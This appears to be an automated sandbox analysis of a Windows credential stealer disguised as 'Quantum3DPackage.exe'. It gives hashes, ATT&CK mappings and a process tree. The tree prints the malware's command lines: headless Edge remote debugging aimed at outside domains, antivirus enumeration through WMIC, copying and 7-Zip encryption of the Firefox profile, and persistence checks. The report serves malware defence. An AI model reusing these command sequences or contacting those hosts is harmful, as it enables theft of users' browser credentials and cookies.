bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
01-08-2024 08:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quantum3DPackage.exe
Size

8.0MB
MD5

7a9e91cd05bb23625354d0f46066904c
SHA1

7389f1881aba1c2ba3544321bd068bbf91dfa00a
SHA256

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40
SHA512

cdcd8c13f582682279463afc1a6196b65e127a0cb344632f1c2222f8f64793ae8c19547758eda94ece0bc9526b6ed13e552c3f6c9dbc2c6f157e601cbbc95c65
SSDEEP

49152:BYyqyQ4SjTErF0JwHoLjhbi4zmkKm0W85GNLZLgKT/MNMNngOdTMnWAqkeKbr3kg:PgR2HoLtb

Score

9^/10

credential_access discovery stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Uses browser remote debugging 2 TTPs 2 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exe

pid process

4964 msedge.exe
3584 msedge.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Quantum3DPackage.exea2-stl-0729-early-(1)-TESTED.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	Quantum3DPackage.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation	a2-stl-0729-early-(1)-TESTED.exe

Executes dropped EXE 8 IoCs

Processes:

kedb.exea2-stl-0729-early-(1)-TESTED.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exekedb.exe7za.exe

pid process

4408 kedb.exe
440 a2-stl-0729-early-(1)-TESTED.exe
656 PsInfo.exe
1832 PsInfo64.exe
1968 PsInfo64.exe
1260 PsInfo64.exe
1408 kedb.exe
4428 7za.exe
Loads dropped DLL 1 IoCs

Processes:

msedge.exe

pid process

3584 msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4408	kedb.exe
440	a2-stl-0729-early-(1)-TESTED.exe
656	PsInfo.exe
1832	PsInfo64.exe
1968	PsInfo64.exe
1260	PsInfo64.exe
1408	kedb.exe
4428	7za.exe

pid	process
3584	msedge.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

kedb.exePsInfo.exekedb.exe7za.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PsInfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exeRobocopy.exe

pid process

2448 cmd.exe
4832 Robocopy.exe

pid	process
2448	cmd.exe
4832	Robocopy.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PsInfo64.exePsInfo64.exePsInfo64.exePsInfo.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe

Delays execution with timeout.exe 18 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4352	timeout.exe
1844	timeout.exe
1936	timeout.exe
2800	timeout.exe
3976	timeout.exe
4836	timeout.exe
4416	timeout.exe
2164	timeout.exe
3240	timeout.exe
3732	timeout.exe
4676	timeout.exe
3700	timeout.exe
3252	timeout.exe
1676	timeout.exe
3228	timeout.exe
2368	timeout.exe
2992	timeout.exe
4192	timeout.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2520 systeminfo.exe

pid	process
2520	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

msedge.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exemsedge.exe

pid	process
4964	msedge.exe
4964	msedge.exe
656	PsInfo.exe
656	PsInfo.exe
656	PsInfo.exe
1832	PsInfo64.exe
1832	PsInfo64.exe
1832	PsInfo64.exe
1968	PsInfo64.exe
1968	PsInfo64.exe
1968	PsInfo64.exe
1260	PsInfo64.exe
1260	PsInfo64.exe
1260	PsInfo64.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe
3584	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

WMIC.exemsedge.exeRobocopy.exe7za.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
Token: SeUndockPrivilege	1904	WMIC.exe
Token: SeManageVolumePrivilege	1904	WMIC.exe
Token: 33	1904	WMIC.exe
Token: 34	1904	WMIC.exe
Token: 35	1904	WMIC.exe
Token: 36	1904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
Token: SeUndockPrivilege	1904	WMIC.exe
Token: SeManageVolumePrivilege	1904	WMIC.exe
Token: 33	1904	WMIC.exe
Token: 34	1904	WMIC.exe
Token: 35	1904	WMIC.exe
Token: 36	1904	WMIC.exe
Token: 33	4964	msedge.exe
Token: SeIncBasePriorityPrivilege	4964	msedge.exe
Token: 33	4964	msedge.exe
Token: SeIncBasePriorityPrivilege	4964	msedge.exe
Token: 33	4964	msedge.exe
Token: SeIncBasePriorityPrivilege	4964	msedge.exe
Token: SeBackupPrivilege	4832	Robocopy.exe
Token: SeRestorePrivilege	4832	Robocopy.exe
Token: SeSecurityPrivilege	4832	Robocopy.exe
Token: SeTakeOwnershipPrivilege	4832	Robocopy.exe
Token: SeRestorePrivilege	4428	7za.exe
Token: 35	4428	7za.exe
Token: SeSecurityPrivilege	4428	7za.exe
Token: SeSecurityPrivilege	4428	7za.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Quantum3DPackage.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exemsedge.execmd.execmd.execmd.execmd.exea2-stl-0729-early-(1)-TESTED.exe

description	pid	process	target process
PID 2988 wrote to memory of 1772	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 1772	2988	Quantum3DPackage.exe	cmd.exe
PID 1772 wrote to memory of 4676	1772	cmd.exe	timeout.exe
PID 1772 wrote to memory of 4676	1772	cmd.exe	timeout.exe
PID 2988 wrote to memory of 1828	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 1828	2988	Quantum3DPackage.exe	cmd.exe
PID 1828 wrote to memory of 3228	1828	cmd.exe	timeout.exe
PID 1828 wrote to memory of 3228	1828	cmd.exe	timeout.exe
PID 2988 wrote to memory of 5080	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 5080	2988	Quantum3DPackage.exe	cmd.exe
PID 5080 wrote to memory of 1936	5080	cmd.exe	timeout.exe
PID 5080 wrote to memory of 1936	5080	cmd.exe	timeout.exe
PID 2988 wrote to memory of 3724	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 3724	2988	Quantum3DPackage.exe	cmd.exe
PID 3724 wrote to memory of 3240	3724	cmd.exe	timeout.exe
PID 3724 wrote to memory of 3240	3724	cmd.exe	timeout.exe
PID 2988 wrote to memory of 4584	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 4584	2988	Quantum3DPackage.exe	cmd.exe
PID 4584 wrote to memory of 2368	4584	cmd.exe	timeout.exe
PID 4584 wrote to memory of 2368	4584	cmd.exe	timeout.exe
PID 2988 wrote to memory of 4952	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 4952	2988	Quantum3DPackage.exe	cmd.exe
PID 4952 wrote to memory of 3700	4952	cmd.exe	timeout.exe
PID 4952 wrote to memory of 3700	4952	cmd.exe	timeout.exe
PID 2988 wrote to memory of 1356	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 1356	2988	Quantum3DPackage.exe	cmd.exe
PID 1356 wrote to memory of 2800	1356	cmd.exe	timeout.exe
PID 1356 wrote to memory of 2800	1356	cmd.exe	timeout.exe
PID 2988 wrote to memory of 1640	2988	Quantum3DPackage.exe	cmd.exe
PID 2988 wrote to memory of 1640	2988	Quantum3DPackage.exe	cmd.exe
PID 1640 wrote to memory of 2992	1640	cmd.exe	timeout.exe
PID 1640 wrote to memory of 2992	1640	cmd.exe	timeout.exe
PID 2988 wrote to memory of 4964	2988	Quantum3DPackage.exe	msedge.exe
PID 2988 wrote to memory of 4964	2988	Quantum3DPackage.exe	msedge.exe
PID 2988 wrote to memory of 4964	2988	Quantum3DPackage.exe	msedge.exe
PID 4964 wrote to memory of 2552	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 2552	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 720	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 720	4964	msedge.exe	cmd.exe
PID 720 wrote to memory of 1904	720	cmd.exe	WMIC.exe
PID 720 wrote to memory of 1904	720	cmd.exe	WMIC.exe
PID 4964 wrote to memory of 4796	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 4796	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 2940	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 2940	4964	msedge.exe	cmd.exe
PID 2940 wrote to memory of 4408	2940	cmd.exe	kedb.exe
PID 2940 wrote to memory of 4408	2940	cmd.exe	kedb.exe
PID 2940 wrote to memory of 4408	2940	cmd.exe	kedb.exe
PID 4964 wrote to memory of 4420	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 4420	4964	msedge.exe	cmd.exe
PID 4420 wrote to memory of 2520	4420	cmd.exe	systeminfo.exe
PID 4420 wrote to memory of 2520	4420	cmd.exe	systeminfo.exe
PID 4420 wrote to memory of 1292	4420	cmd.exe	findstr.exe
PID 4420 wrote to memory of 1292	4420	cmd.exe	findstr.exe
PID 4964 wrote to memory of 4808	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 4808	4964	msedge.exe	cmd.exe
PID 4808 wrote to memory of 3252	4808	cmd.exe	timeout.exe
PID 4808 wrote to memory of 3252	4808	cmd.exe	timeout.exe
PID 4964 wrote to memory of 440	4964	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 4964 wrote to memory of 440	4964	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 4964 wrote to memory of 1980	4964	msedge.exe	cmd.exe
PID 4964 wrote to memory of 1980	4964	msedge.exe	cmd.exe
PID 440 wrote to memory of 3232	440	a2-stl-0729-early-(1)-TESTED.exe	cmd.exe
PID 440 wrote to memory of 3232	440	a2-stl-0729-early-(1)-TESTED.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Quantum3DPackage.exe
"C:\Users\Admin\AppData\Local\Temp\Quantum3DPackage.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:4952

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://trujillolauriannelamar.com
2⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
3⤵
PID:2552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\821 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:720

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\821 > C:\Users\Admin\AppData\Local\temp\460
3⤵
PID:4796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o bxlg.zip
3⤵
- Suspicious use of WriteProcessMemory
PID:2940

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o bxlg.zip
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2520

C:\Windows\system32\findstr.exe
findstr /C:"OS Name"
4⤵
PID:1292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:3252

C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe
"C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3232

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:608

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:4836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:208

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:4416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:4688

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3684

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:4352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:876

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:5100

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2120

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:4192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://annetteedgardomalcolm.com
4⤵
- Uses browser remote debugging
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
5⤵
PID:5060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o jucq_x64.zip
5⤵
PID:1624

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o jucq_x64.zip
6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2448

C:\Windows\system32\Robocopy.exe
robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe a "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\746D7155E1707F2FDEA67BFA99AB8E_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
5⤵
PID:3336

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe a "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\746D7155E1707F2FDEA67BFA99AB8E_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
5⤵
PID:1032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\suogl"& "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\suogl"
3⤵
PID:1980

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:656

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\suogl" & "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\suogl"
3⤵
PID:516

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1968

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2352

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:3208

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:3840

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:5000

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:5072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:3456

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:3860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:532

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:3936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
PID:1596

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:3732

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Discovery

Query Registry

T1012

System Information Discovery

T1082

Browser Information Discovery

T1217

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

